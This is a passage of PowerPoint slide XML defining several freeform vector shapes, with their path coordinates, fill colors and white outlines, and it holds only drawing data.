                      <a:pt x="14" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36120" name="Freeform 253"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2469" y="2489"/>
                <a:ext cx="133" cy="110"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 133"/>
                  <a:gd name="T1" fmla="*/ 109 h 110"/>
                  <a:gd name="T2" fmla="*/ 1 w 133"/>
                  <a:gd name="T3" fmla="*/ 104 h 110"/>
                  <a:gd name="T4" fmla="*/ 3 w 133"/>
                  <a:gd name="T5" fmla="*/ 97 h 110"/>
                  <a:gd name="T6" fmla="*/ 7 w 133"/>
                  <a:gd name="T7" fmla="*/ 93 h 110"/>
                  <a:gd name="T8" fmla="*/ 11 w 133"/>
                  <a:gd name="T9" fmla="*/ 89 h 110"/>
                  <a:gd name="T10" fmla="*/ 12 w 133"/>
                  <a:gd name="T11" fmla="*/ 85 h 110"/>
                  <a:gd name="T12" fmla="*/ 21 w 133"/>
                  <a:gd name="T13" fmla="*/ 65 h 110"/>
                  <a:gd name="T14" fmla="*/ 22 w 133"/>
                  <a:gd name="T15" fmla="*/ 63 h 110"/>
                  <a:gd name="T16" fmla="*/ 32 w 133"/>
                  <a:gd name="T17" fmla="*/ 54 h 110"/>
                  <a:gd name="T18" fmla="*/ 35 w 133"/>
                  <a:gd name="T19" fmla="*/ 50 h 110"/>
                  <a:gd name="T20" fmla="*/ 35 w 133"/>
                  <a:gd name="T21" fmla="*/ 43 h 110"/>
                  <a:gd name="T22" fmla="*/ 37 w 133"/>
                  <a:gd name="T23" fmla="*/ 34 h 110"/>
                  <a:gd name="T24" fmla="*/ 42 w 133"/>
                  <a:gd name="T25" fmla="*/ 26 h 110"/>
                  <a:gd name="T26" fmla="*/ 45 w 133"/>
                  <a:gd name="T27" fmla="*/ 23 h 110"/>
                  <a:gd name="T28" fmla="*/ 48 w 133"/>
                  <a:gd name="T29" fmla="*/ 22 h 110"/>
                  <a:gd name="T30" fmla="*/ 54 w 133"/>
                  <a:gd name="T31" fmla="*/ 17 h 110"/>
                  <a:gd name="T32" fmla="*/ 56 w 133"/>
                  <a:gd name="T33" fmla="*/ 14 h 110"/>
                  <a:gd name="T34" fmla="*/ 59 w 133"/>
                  <a:gd name="T35" fmla="*/ 7 h 110"/>
                  <a:gd name="T36" fmla="*/ 62 w 133"/>
                  <a:gd name="T37" fmla="*/ 0 h 110"/>
                  <a:gd name="T38" fmla="*/ 73 w 133"/>
                  <a:gd name="T39" fmla="*/ 0 h 110"/>
                  <a:gd name="T40" fmla="*/ 91 w 133"/>
                  <a:gd name="T41" fmla="*/ 0 h 110"/>
                  <a:gd name="T42" fmla="*/ 111 w 133"/>
                  <a:gd name="T43" fmla="*/ 0 h 110"/>
                  <a:gd name="T44" fmla="*/ 123 w 133"/>
                  <a:gd name="T45" fmla="*/ 0 h 110"/>
                  <a:gd name="T46" fmla="*/ 133 w 133"/>
                  <a:gd name="T47" fmla="*/ 0 h 110"/>
                  <a:gd name="T48" fmla="*/ 133 w 133"/>
                  <a:gd name="T49" fmla="*/ 7 h 110"/>
                  <a:gd name="T50" fmla="*/ 133 w 133"/>
                  <a:gd name="T51" fmla="*/ 21 h 110"/>
                  <a:gd name="T52" fmla="*/ 133 w 133"/>
                  <a:gd name="T53" fmla="*/ 26 h 110"/>
                  <a:gd name="T54" fmla="*/ 132 w 133"/>
                  <a:gd name="T55" fmla="*/ 29 h 110"/>
                  <a:gd name="T56" fmla="*/ 128 w 133"/>
                  <a:gd name="T57" fmla="*/ 29 h 110"/>
                  <a:gd name="T58" fmla="*/ 85 w 133"/>
                  <a:gd name="T59" fmla="*/ 29 h 110"/>
                  <a:gd name="T60" fmla="*/ 81 w 133"/>
                  <a:gd name="T61" fmla="*/ 30 h 110"/>
                  <a:gd name="T62" fmla="*/ 81 w 133"/>
                  <a:gd name="T63" fmla="*/ 34 h 110"/>
                  <a:gd name="T64" fmla="*/ 80 w 133"/>
                  <a:gd name="T65" fmla="*/ 52 h 110"/>
                  <a:gd name="T66" fmla="*/ 80 w 133"/>
                  <a:gd name="T67" fmla="*/ 72 h 110"/>
                  <a:gd name="T68" fmla="*/ 79 w 133"/>
                  <a:gd name="T69" fmla="*/ 73 h 110"/>
                  <a:gd name="T70" fmla="*/ 73 w 133"/>
                  <a:gd name="T71" fmla="*/ 75 h 110"/>
                  <a:gd name="T72" fmla="*/ 68 w 133"/>
                  <a:gd name="T73" fmla="*/ 78 h 110"/>
                  <a:gd name="T74" fmla="*/ 64 w 133"/>
                  <a:gd name="T75" fmla="*/ 81 h 110"/>
                  <a:gd name="T76" fmla="*/ 62 w 133"/>
                  <a:gd name="T77" fmla="*/ 84 h 110"/>
                  <a:gd name="T78" fmla="*/ 62 w 133"/>
                  <a:gd name="T79" fmla="*/ 89 h 110"/>
                  <a:gd name="T80" fmla="*/ 63 w 133"/>
                  <a:gd name="T81" fmla="*/ 101 h 110"/>
                  <a:gd name="T82" fmla="*/ 63 w 133"/>
                  <a:gd name="T83" fmla="*/ 110 h 110"/>
                  <a:gd name="T84" fmla="*/ 62 w 133"/>
                  <a:gd name="T85" fmla="*/ 109 h 110"/>
                  <a:gd name="T86" fmla="*/ 57 w 133"/>
                  <a:gd name="T87" fmla="*/ 110 h 110"/>
                  <a:gd name="T88" fmla="*/ 39 w 133"/>
                  <a:gd name="T89" fmla="*/ 109 h 110"/>
                  <a:gd name="T90" fmla="*/ 3 w 133"/>
                  <a:gd name="T91" fmla="*/ 109 h 110"/>
                  <a:gd name="T92" fmla="*/ 0 w 133"/>
                  <a:gd name="T93" fmla="*/ 109 h 110"/>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133"/>
                  <a:gd name="T142" fmla="*/ 0 h 110"/>
                  <a:gd name="T143" fmla="*/ 133 w 133"/>
                  <a:gd name="T144" fmla="*/ 110 h 110"/>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133" h="110">
                    <a:moveTo>
                      <a:pt x="0" y="109"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="109"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36121" name="Freeform 254"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2469" y="2489"/>
                <a:ext cx="133" cy="110"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 133"/>
                  <a:gd name="T1" fmla="*/ 109 h 110"/>
                  <a:gd name="T2" fmla="*/ 1 w 133"/>
                  <a:gd name="T3" fmla="*/ 104 h 110"/>
                  <a:gd name="T4" fmla="*/ 3 w 133"/>
                  <a:gd name="T5" fmla="*/ 97 h 110"/>
                  <a:gd name="T6" fmla="*/ 7 w 133"/>
                  <a:gd name="T7" fmla="*/ 93 h 110"/>
                  <a:gd name="T8" fmla="*/ 11 w 133"/>
                  <a:gd name="T9" fmla="*/ 89 h 110"/>
                  <a:gd name="T10" fmla="*/ 12 w 133"/>
                  <a:gd name="T11" fmla="*/ 85 h 110"/>
                  <a:gd name="T12" fmla="*/ 21 w 133"/>
                  <a:gd name="T13" fmla="*/ 65 h 110"/>
                  <a:gd name="T14" fmla="*/ 22 w 133"/>
                  <a:gd name="T15" fmla="*/ 63 h 110"/>
                  <a:gd name="T16" fmla="*/ 32 w 133"/>
                  <a:gd name="T17" fmla="*/ 54 h 110"/>
                  <a:gd name="T18" fmla="*/ 35 w 133"/>
                  <a:gd name="T19" fmla="*/ 50 h 110"/>
                  <a:gd name="T20" fmla="*/ 35 w 133"/>
                  <a:gd name="T21" fmla="*/ 43 h 110"/>
                  <a:gd name="T22" fmla="*/ 37 w 133"/>
                  <a:gd name="T23" fmla="*/ 34 h 110"/>
                  <a:gd name="T24" fmla="*/ 42 w 133"/>
                  <a:gd name="T25" fmla="*/ 26 h 110"/>
                  <a:gd name="T26" fmla="*/ 45 w 133"/>
                  <a:gd name="T27" fmla="*/ 23 h 110"/>
                  <a:gd name="T28" fmla="*/ 48 w 133"/>
                  <a:gd name="T29" fmla="*/ 22 h 110"/>
                  <a:gd name="T30" fmla="*/ 54 w 133"/>
                  <a:gd name="T31" fmla="*/ 17 h 110"/>
                  <a:gd name="T32" fmla="*/ 56 w 133"/>
                  <a:gd name="T33" fmla="*/ 14 h 110"/>
                  <a:gd name="T34" fmla="*/ 59 w 133"/>
                  <a:gd name="T35" fmla="*/ 7 h 110"/>
                  <a:gd name="T36" fmla="*/ 62 w 133"/>
                  <a:gd name="T37" fmla="*/ 0 h 110"/>
                  <a:gd name="T38" fmla="*/ 73 w 133"/>
                  <a:gd name="T39" fmla="*/ 0 h 110"/>
                  <a:gd name="T40" fmla="*/ 91 w 133"/>
                  <a:gd name="T41" fmla="*/ 0 h 110"/>
                  <a:gd name="T42" fmla="*/ 111 w 133"/>
                  <a:gd name="T43" fmla="*/ 0 h 110"/>
                  <a:gd name="T44" fmla="*/ 123 w 133"/>
                  <a:gd name="T45" fmla="*/ 0 h 110"/>
                  <a:gd name="T46" fmla="*/ 133 w 133"/>
                  <a:gd name="T47" fmla="*/ 0 h 110"/>
                  <a:gd name="T48" fmla="*/ 133 w 133"/>
                  <a:gd name="T49" fmla="*/ 7 h 110"/>
                  <a:gd name="T50" fmla="*/ 133 w 133"/>
                  <a:gd name="T51" fmla="*/ 21 h 110"/>
                  <a:gd name="T52" fmla="*/ 133 w 133"/>
                  <a:gd name="T53" fmla="*/ 26 h 110"/>
                  <a:gd name="T54" fmla="*/ 132 w 133"/>
                  <a:gd name="T55" fmla="*/ 29 h 110"/>
                  <a:gd name="T56" fmla="*/ 128 w 133"/>
                  <a:gd name="T57" fmla="*/ 29 h 110"/>
                  <a:gd name="T58" fmla="*/ 85 w 133"/>
                  <a:gd name="T59" fmla="*/ 29 h 110"/>
                  <a:gd name="T60" fmla="*/ 81 w 133"/>
                  <a:gd name="T61" fmla="*/ 30 h 110"/>
                  <a:gd name="T62" fmla="*/ 81 w 133"/>
                  <a:gd name="T63" fmla="*/ 34 h 110"/>
                  <a:gd name="T64" fmla="*/ 80 w 133"/>
                  <a:gd name="T65" fmla="*/ 52 h 110"/>
                  <a:gd name="T66" fmla="*/ 80 w 133"/>
                  <a:gd name="T67" fmla="*/ 72 h 110"/>
                  <a:gd name="T68" fmla="*/ 79 w 133"/>
                  <a:gd name="T69" fmla="*/ 73 h 110"/>
                  <a:gd name="T70" fmla="*/ 73 w 133"/>
                  <a:gd name="T71" fmla="*/ 75 h 110"/>
                  <a:gd name="T72" fmla="*/ 68 w 133"/>
                  <a:gd name="T73" fmla="*/ 78 h 110"/>
                  <a:gd name="T74" fmla="*/ 64 w 133"/>
                  <a:gd name="T75" fmla="*/ 81 h 110"/>
                  <a:gd name="T76" fmla="*/ 62 w 133"/>
                  <a:gd name="T77" fmla="*/ 84 h 110"/>
                  <a:gd name="T78" fmla="*/ 62 w 133"/>
                  <a:gd name="T79" fmla="*/ 89 h 110"/>
                  <a:gd name="T80" fmla="*/ 63 w 133"/>
                  <a:gd name="T81" fmla="*/ 101 h 110"/>
                  <a:gd name="T82" fmla="*/ 63 w 133"/>
                  <a:gd name="T83" fmla="*/ 110 h 110"/>
                  <a:gd name="T84" fmla="*/ 62 w 133"/>
                  <a:gd name="T85" fmla="*/ 109 h 110"/>
                  <a:gd name="T86" fmla="*/ 57 w 133"/>
                  <a:gd name="T87" fmla="*/ 110 h 110"/>
                  <a:gd name="T88" fmla="*/ 39 w 133"/>
                  <a:gd name="T89" fmla="*/ 109 h 110"/>
                  <a:gd name="T90" fmla="*/ 3 w 133"/>
                  <a:gd name="T91" fmla="*/ 109 h 110"/>
                  <a:gd name="T92" fmla="*/ 0 w 133"/>
                  <a:gd name="T93" fmla="*/ 109 h 110"/>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133"/>
                  <a:gd name="T142" fmla="*/ 0 h 110"/>
                  <a:gd name="T143" fmla="*/ 133 w 133"/>
                  <a:gd name="T144" fmla="*/ 110 h 110"/>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133" h="110">
                    <a:moveTo>
                      <a:pt x="0" y="109"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="109"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36122" name="Freeform 255"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2833" y="1898"/>
                <a:ext cx="144" cy="193"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 144"/>
                  <a:gd name="T1" fmla="*/ 172 h 193"/>
                  <a:gd name="T2" fmla="*/ 31 w 144"/>
                  <a:gd name="T3" fmla="*/ 151 h 193"/>
                  <a:gd name="T4" fmla="*/ 22 w 144"/>
                  <a:gd name="T5" fmla="*/ 149 h 193"/>
                  <a:gd name="T6" fmla="*/ 8 w 144"/>
                  <a:gd name="T7" fmla="*/ 142 h 193"/>
                  <a:gd name="T8" fmla="*/ 3 w 144"/>
                  <a:gd name="T9" fmla="*/ 129 h 193"/>
                  <a:gd name="T10" fmla="*/ 1 w 144"/>
                  <a:gd name="T11" fmla="*/ 110 h 193"/>
                  <a:gd name="T12" fmla="*/ 2 w 144"/>
                  <a:gd name="T13" fmla="*/ 101 h 193"/>
                  <a:gd name="T14" fmla="*/ 4 w 144"/>
                  <a:gd name="T15" fmla="*/ 90 h 193"/>
                  <a:gd name="T16" fmla="*/ 5 w 144"/>
                  <a:gd name="T17" fmla="*/ 81 h 193"/>
                  <a:gd name="T18" fmla="*/ 18 w 144"/>
                  <a:gd name="T19" fmla="*/ 72 h 193"/>
                  <a:gd name="T20" fmla="*/ 13 w 144"/>
                  <a:gd name="T21" fmla="*/ 64 h 193"/>
                  <a:gd name="T22" fmla="*/ 20 w 144"/>
                  <a:gd name="T23" fmla="*/ 48 h 193"/>
                  <a:gd name="T24" fmla="*/ 22 w 144"/>
                  <a:gd name="T25" fmla="*/ 36 h 193"/>
                  <a:gd name="T26" fmla="*/ 33 w 144"/>
                  <a:gd name="T27" fmla="*/ 42 h 193"/>
                  <a:gd name="T28" fmla="*/ 38 w 144"/>
                  <a:gd name="T29" fmla="*/ 38 h 193"/>
                  <a:gd name="T30" fmla="*/ 51 w 144"/>
                  <a:gd name="T31" fmla="*/ 31 h 193"/>
                  <a:gd name="T32" fmla="*/ 45 w 144"/>
                  <a:gd name="T33" fmla="*/ 22 h 193"/>
                  <a:gd name="T34" fmla="*/ 46 w 144"/>
                  <a:gd name="T35" fmla="*/ 16 h 193"/>
                  <a:gd name="T36" fmla="*/ 43 w 144"/>
                  <a:gd name="T37" fmla="*/ 1 h 193"/>
                  <a:gd name="T38" fmla="*/ 64 w 144"/>
                  <a:gd name="T39" fmla="*/ 12 h 193"/>
                  <a:gd name="T40" fmla="*/ 70 w 144"/>
                  <a:gd name="T41" fmla="*/ 16 h 193"/>
                  <a:gd name="T42" fmla="*/ 81 w 144"/>
                  <a:gd name="T43" fmla="*/ 21 h 193"/>
                  <a:gd name="T44" fmla="*/ 84 w 144"/>
                  <a:gd name="T45" fmla="*/ 29 h 193"/>
                  <a:gd name="T46" fmla="*/ 107 w 144"/>
                  <a:gd name="T47" fmla="*/ 17 h 193"/>
                  <a:gd name="T48" fmla="*/ 118 w 144"/>
                  <a:gd name="T49" fmla="*/ 24 h 193"/>
                  <a:gd name="T50" fmla="*/ 125 w 144"/>
                  <a:gd name="T51" fmla="*/ 31 h 193"/>
                  <a:gd name="T52" fmla="*/ 133 w 144"/>
                  <a:gd name="T53" fmla="*/ 36 h 193"/>
                  <a:gd name="T54" fmla="*/ 133 w 144"/>
                  <a:gd name="T55" fmla="*/ 59 h 193"/>
                  <a:gd name="T56" fmla="*/ 139 w 144"/>
                  <a:gd name="T57" fmla="*/ 76 h 193"/>
                  <a:gd name="T58" fmla="*/ 140 w 144"/>
                  <a:gd name="T59" fmla="*/ 87 h 193"/>
                  <a:gd name="T60" fmla="*/ 140 w 144"/>
                  <a:gd name="T61" fmla="*/ 107 h 193"/>
                  <a:gd name="T62" fmla="*/ 134 w 144"/>
                  <a:gd name="T63" fmla="*/ 105 h 193"/>
                  <a:gd name="T64" fmla="*/ 121 w 144"/>
                  <a:gd name="T65" fmla="*/ 110 h 193"/>
                  <a:gd name="T66" fmla="*/ 113 w 144"/>
                  <a:gd name="T67" fmla="*/ 115 h 193"/>
                  <a:gd name="T68" fmla="*/ 102 w 144"/>
                  <a:gd name="T69" fmla="*/ 121 h 193"/>
                  <a:gd name="T70" fmla="*/ 104 w 144"/>
                  <a:gd name="T71" fmla="*/ 131 h 193"/>
                  <a:gd name="T72" fmla="*/ 110 w 144"/>
                  <a:gd name="T73" fmla="*/ 144 h 193"/>
                  <a:gd name="T74" fmla="*/ 122 w 144"/>
                  <a:gd name="T75" fmla="*/ 152 h 193"/>
                  <a:gd name="T76" fmla="*/ 119 w 144"/>
                  <a:gd name="T77" fmla="*/ 162 h 193"/>
                  <a:gd name="T78" fmla="*/ 108 w 144"/>
                  <a:gd name="T79" fmla="*/ 174 h 193"/>
                  <a:gd name="T80" fmla="*/ 112 w 144"/>
                  <a:gd name="T81" fmla="*/ 188 h 193"/>
                  <a:gd name="T82" fmla="*/ 104 w 144"/>
                  <a:gd name="T83" fmla="*/ 185 h 193"/>
                  <a:gd name="T84" fmla="*/ 89 w 144"/>
                  <a:gd name="T85" fmla="*/ 188 h 193"/>
                  <a:gd name="T86" fmla="*/ 79 w 144"/>
                  <a:gd name="T87" fmla="*/ 189 h 193"/>
                  <a:gd name="T88" fmla="*/ 71 w 144"/>
                  <a:gd name="T89" fmla="*/ 190 h 193"/>
                  <a:gd name="T90" fmla="*/ 65 w 144"/>
                  <a:gd name="T91" fmla="*/ 189 h 193"/>
                  <a:gd name="T92" fmla="*/ 59 w 144"/>
                  <a:gd name="T93" fmla="*/ 187 h 193"/>
                  <a:gd name="T94" fmla="*/ 43 w 144"/>
                  <a:gd name="T95" fmla="*/ 183 h 193"/>
                  <a:gd name="T96" fmla="*/ 35 w 144"/>
                  <a:gd name="T97" fmla="*/ 185 h 193"/>
                  <a:gd name="T98" fmla="*/ 131 w 144"/>
                  <a:gd name="T99" fmla="*/ 30 h 193"/>
                  <a:gd name="T100" fmla="*/ 125 w 144"/>
                  <a:gd name="T101" fmla="*/ 24 h 193"/>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144"/>
                  <a:gd name="T154" fmla="*/ 0 h 193"/>
                  <a:gd name="T155" fmla="*/ 144 w 144"/>
                  <a:gd name="T156" fmla="*/ 193 h 193"/>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144" h="193">
                    <a:moveTo>
                      <a:pt x="25" y="186"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="24" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="121"/>
